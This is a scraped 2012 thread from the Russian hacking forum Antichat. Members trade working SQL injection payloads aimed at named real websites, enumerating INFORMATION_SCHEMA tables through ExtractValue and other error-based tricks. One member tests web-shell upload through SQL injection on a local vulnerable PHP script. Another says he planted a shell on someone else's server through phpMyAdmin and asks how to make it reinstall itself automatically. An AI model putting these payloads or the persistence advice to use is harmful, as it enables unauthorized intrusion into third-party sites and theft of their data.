ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
21.10.2012, 10:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
11466
Репутация:
3
|
|
Сообщение от Expl0ited
Expl0ited said:
лимит использовать
А как его заюзать без пробелов? limit(0,1) не проходит
|
|
|
|
21.10.2012, 14:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
11466
Репутация:
3
|
|
Ребята как раскрутить дальше??
Код:
Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+concat(+0x3a,version()+)+)+)='1
делал так
Код:
Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+concat(+0x3a,+select+table_name+from+INFORMATION_SCHEMA.TABLES+)+)+)='1 ОБЛОМ.
и так
Код:
Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+concat(+0x3a,+select+table_name+from+INFORMATION_SCHEMA.TABLES+limit+1,2+)+)+)='1 ОБЛОМ.
Так же не решен вопрос с этой скулей
Код:
Code:
http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3d,select(TABLE_NAME)from(INFORMATION_SCHEMA.TABLES))))='1.html
Прошу показать хотя бы вывод table_name из INFORMATION_SCHEMA. Спасибо |
|
|
|
21.10.2012, 15:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
178623
Репутация:
94
|
|
Не нашел раздела с уязвимостями для Bitrix. Посоветуйте.
|
|
|
|
21.10.2012, 15:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
11466
Репутация:
3
|
|
Сообщение от MaxFast
MaxFast said:
Не нашел раздела с уязвимостями для Bitrix. Посоветуйте.
Тут наверно _/thread58123.html
|
|
|
|
21.10.2012, 15:26
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от WendM
WendM said:
Ребята как раскрутить дальше??
Код:
Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+concat(+0x3a,version()+)+)+)='1
делал так
Код:
Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+concat(+0x3a,+select+table_name+from+INFORMATION_SCHEMA.TABLES+)+)+)='1 ОБЛОМ.
и так
Код:
Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+concat(+0x3a,+select+table_name+from+INFORMATION_SCHEMA.TABLES+limit+1,2+)+)+)='1 ОБЛОМ.
Так же не решен вопрос с этой скулей
Код:
Code:
http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3d,select(TABLE_NAME)from(INFORMATION_SCHEMA.TABLES))))='1.html
Прошу показать хотя бы вывод table_name из INFORMATION_SCHEMA. Спасибо Пользуйся)
Сообщение от None
http://www.muscletalk.ru/pharma.php?id=999999.9%27+or+%28+ExtractValue+%281 ,concat%280x3a,%28select+table_name+from+informati on_schema.tables+limit+0,1%29%29%29%29=%271
|
|
|
21.10.2012, 15:35
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
Сообщение от WendM
WendM said:
Ребята как раскрутить дальше??
Код:
Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+concat(+0x3a,version()+)+)+)='1
делал так
Код:
Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+concat(+0x3a,+select+table_name+from+INFORMATION_SCHEMA.TABLES+)+)+)='1 ОБЛОМ.
и так
Код:
Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+concat(+0x3a,+select+table_name+from+INFORMATION_SCHEMA.TABLES+limit+1,2+)+)+)='1 ОБЛОМ.
Так же не решен вопрос с этой скулей
Код:
Code:
http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3d,select(TABLE_NAME)from(INFORMATION_SCHEMA.TABLES))))='1.html
Прошу показать хотя бы вывод table_name из INFORMATION_SCHEMA. Спасибо ,
Держите решение Вашей проблемы:
Код:
Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+in+(select(@:=1)||@+from+(select+1+union+select+2+union+select+3)k+group+by+concat(@@version,!@)having@||min(@:=0))+and+'1#
|
|
|
|
21.10.2012, 15:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
11466
Репутация:
3
|
|
Сообщение от winstrool
winstrool said:
Пользуйся)
Спасибо) Но такой вариант не проходит на
Код:
Code:
http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3d,select(TABLE_NAM E)from(INFORMATION_SCHEMA.TABLES))))='1.html
|
|
|
|
21.10.2012, 18:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
11466
Репутация:
3
|
|
Тестирую на локалке метод залива шелла через sql inj.
Уязвимый php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]Новость №"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$line[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"
"[/COLOR][COLOR="#007700"];
}
exit;
}
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT text FROM news WHERE id= "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);
print[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
while ([/COLOR][COLOR="#0000BB"]$line[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]MYSQL_ASSOC[/COLOR][COLOR="#007700"])) {
print[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
foreach ([/COLOR][COLOR="#0000BB"]$line[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$col_value[/COLOR][COLOR="#007700"]) {
print[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$col_value[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];
}
print[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
}
print[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]mysql_free_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]mysql_close[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
Делаю запрос
Код:
Code:
http://localhost/mynews.php?id=1+union+select+file_priv+from+mysql.user+where+user='root'+--+
Вылетают ошибки.
Делаю так
Код:
Code:
http://localhost/mynews.php?id=1+union+select+file_priv+from+mysql.user+where+user=0x27726F6F7427+--+
Выводится First news
Что не так делаю? |
|
|
|
21.10.2012, 21:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
2422
Репутация:
0
|
|
Получилось залить шелл через phpmyadmin, но админы на серве постоянно переустанавливают свой серв и стирают мой шелл, даже иногда не устанавливают phpmyadmin, но вот седня снова они его установили я побырому залил шел во все щели но это не поможет после переустановки все снова слетит. Но база mysql она всегда таже, вот я и подумал можно ли создать там таблицу с этим кодом
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]Click"[/COLOR][COLOR="#007700"];} else {die([/COLOR][COLOR="#DD0000"]"err"[/COLOR][COLOR="#007700"]);}}[/COLOR][COLOR="#0000BB"]?>[/COLOR]
[/COLOR]
И как то указать чтоб он автоматически его создавал по указанному адресу например раз в неделю или при его отсутствии. Помогите плииз. |
|
|
|
21.10.2012, 21:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
dynda2000
http://video.antichat.ru/video/17/ прокатит?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
